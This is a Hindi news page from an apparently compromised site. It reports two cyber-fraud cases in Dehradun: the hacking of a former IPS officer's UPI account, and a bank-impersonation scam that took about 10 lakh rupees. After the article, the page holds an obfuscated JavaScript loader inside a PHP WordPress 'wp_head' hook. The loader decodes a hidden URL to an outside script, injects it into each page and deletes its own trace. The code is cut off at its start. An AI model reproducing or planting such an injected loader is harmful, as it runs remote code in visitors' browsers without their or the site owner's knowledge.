Friday, July 12, 2024
Google search engine
Homeअपराधआईपीएस अधिकारी का यूपीआई हैक कर उड़ाई रकम! जांच है जारी

आईपीएस अधिकारी का यूपीआई हैक कर उड़ाई रकम! जांच है जारी

साइबर ठगों ने दून निवासी पूर्व आईपीएस अधिकारी को ठगी का शिकार बनाया है। पूर्व अधिकारी का यूपीआई अकाउंट हैक कर आरोपितों ने दो ट्रांजेक्शन में खाते से करीब 64 हजार रुपये उड़ा दिए। पीड़ित ने बैंक में सूचना देने के साथ ही पुलिस को शिकायत दी है। साथ ही इसमें यूपीआई के कर्मचारियों की मिलीभगत की भी आशंका जताई है।

राजपुर थाने को प्राप्त शिकायत के अनुसार सहस्रधारा रोड पर कृषाली स्थित ऊषा कॉलोनी में रहने वाले पूर्व आईपीएस अधिकारी विक्रम चंद्र गोयल ने शिकायत दी। बताया कि 24 अगस्त को उनके खाते से बिना उनकी जानकारी के करीब 64 हजार रुपये यूपीआई के माध्यम से किसी अमित कुमार मित्रा के खाते में ट्रांसफर किए गए। विक्रम चंद्र गोयल ने बताया कि वे उस दिन बिग बास्केट की वेबसाइट पर कुछ सामान खरीद रहे थे, जिसके लिए उन्होंने यूपीआई के माध्यम से भुगतान का प्रयास किया, लेकिन भुगतान नहीं हुआ। कुछ देर बाद एक अन्य भुगतान एमेजोन एप पर असफल हो गया। उन्होंने अपना यूपीआई अकाउंट चेक करना चाहा तो वह नहीं खुला। गड़बड़ी का अंदेशा होने पर विक्रम चंद्र गोयल ने एसबीआइ की शाखा में जाकर सूचना दी। स्टेटमेंट चेक करने पर पता चला कि उनके खाते से दो ट्रांजेक्शन में करीब 64 हजार रुपये दूसरे के खाते में डाले गए हैं। राजपुर पुलिस ने मामले में मुकदमा दर्ज कर जांच शुरू कर दी है। खुद को बैंक का अधिकारी बताकर साइबर ठग ने एक व्यक्ति को 10 लाख रुपये का चूना लगा दिया। ढाक पट्टी निवासी रोहित कुमार अग्रवाल ने शिकायत में बताया कि उन्हें बीते बुधवार को अज्ञात नंबर से एक महिला का फोन आया। आरोपित महिला ने खुद को इंड्सइंड बैंक की अधिकारी बताया। उसने कहा कि उनके क्रेडिट कार्ड पर करीब 1800 रुपये का कार्ड प्रोटेक्शन प्लान चालू है, जिसका भुगतान आज ही करना है। ऐसा न करने पर उन पर पेनल्टी लग जाएगी। युवती की बातों में आकर उन्होंने भुगतान करने के लिए सहमति जताई। महिला ने उन्हें एक लिंक भेजकर बैंक खाते की जानकारी भरने को कहा। उसके बाद तीन ट्रांजेक्शन में उनके खाते से 10 लाख रुपये के करीब निकाल लिए गए। शिकायत के आधार पर राजपुर थाना पुलिस ने मुकदमा दर्ज कर लिया है।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>